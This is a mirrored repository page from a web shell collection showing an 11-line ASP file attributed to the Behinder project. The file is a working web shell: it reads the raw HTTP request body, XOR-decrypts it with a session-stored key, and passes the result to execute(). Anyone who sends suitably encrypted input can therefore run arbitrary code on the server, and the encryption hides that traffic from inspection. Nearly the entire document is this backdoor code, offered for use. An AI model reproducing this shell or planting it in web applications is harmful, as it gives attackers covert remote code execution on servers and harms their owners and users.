mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
05e2ea5d89
from : https://github.com/rebeyond/Behinder author: rebeyond 👍
11 lines
232 B
Text
11 lines
232 B
Text
<%
|
|
Response.CharSet = "UTF-8"
|
|
Session("k")=k
|
|
k=Session("k")
|
|
size=Request.TotalBytes
|
|
content=Request.BinaryRead(size)
|
|
For i=1 To size
|
|
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
|
|
Next
|
|
execute(result)
|
|
%>
|